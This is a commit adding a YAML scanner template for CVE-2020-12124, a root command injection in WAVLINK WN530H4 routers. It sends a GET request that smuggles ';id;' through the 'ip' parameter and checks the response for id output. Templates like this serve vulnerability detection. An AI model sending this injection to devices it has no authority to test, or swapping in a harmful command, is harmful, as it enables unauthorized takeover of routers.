Create CVE-2020-12124.yaml

http/cves/2020/CVE-2020-12124.yaml

@@ -0,0 +1,49 @@
+id: CVE-2020-12124
+
+info:
+  name: WAVLINK WN530H4 live_api.cgi - Command Injection
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    A remote command-line injection vulnerability in the /cgi-bin/live_api.cgi endpoint of the WAVLINK WN530H4 M30H4.V5030.190403 allows an attacker to execute arbitrary Linux commands as root without authentication.
+  reference:
+    - https://github.com/db44k/CVE-2020-12124
+    - https://cerne.xyz/bugs/CVE-2020-12124
+    - https://www.wavlink.com/en_us/product/WL-WN530H4.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-12124
+    cwe-id: CWE-78
+    epss-score: 0.00269
+    epss-percentile: 0.64297
+    cpe: cpe:2.3:o:wavlink:wn530h4_firmware:m30h4.v5030.190403:*:*:*:*:*:*:*
+  metadata:
+    vendor: wavlink
+    product: wn530h4_firmware
+  tags: cve,cve2020,rce,wavlink
+
+variables:
+  str: "{{rand_base(3)}}"
+  num: "{{rand_int(1, 10)}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/live_api.cgi?page={{str}}&id={{num}}&ip=;id;"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
+
+      - type: word
+        part: body
+        words:
+          - "WiFiBand"
+
+      - type: status
+        status:
+          - 200